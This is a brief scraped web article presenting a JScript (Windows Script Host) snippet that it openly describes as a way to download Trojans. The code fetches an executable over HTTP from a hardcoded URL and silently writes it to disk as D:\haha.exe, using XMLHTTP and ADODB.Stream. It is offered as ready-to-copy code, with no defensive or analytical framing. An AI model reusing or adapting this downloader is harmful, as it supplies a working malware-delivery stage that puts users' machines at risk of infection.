Home  >  Article  >  Web Front-end  >  JScript script implements file download, generally used to download Trojans_javascript skills

JScript script implements file download, generally used to download Trojans_javascript skills

WBOY
WBOYOriginal
2016-05-16 18:42:581557browse

jscript version

Copy code The code is as follows:

var objArgs=WScript.Arguments;
var sGet=new ActiveXObject("ADODB.Stream"); ​​
var xGet=null;
try{
xGet=new XMLHttpRequest();
}catch(e){
try{
xGet=new ActiveXObject("Msxml2.XMLHTTP");
}catch(ex){
try{
xGet=new ActiveXObject("Microsoft.XMLHTTP");
}catch( e3){
xGet=null;
}
}
}
if(xGet != null){
xGet.Open("GET","http://localhost /aplan/mycalc.exe",0);
xGet.Send();
sGet.Mode=3;
sGet.Type=1;
sGet.Open();
sGet.Write(xGet.ResponseBody);
sGet.SaveToFile("D:\haha.exe",2);
}


For the vbscript version, please checkThis article.
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn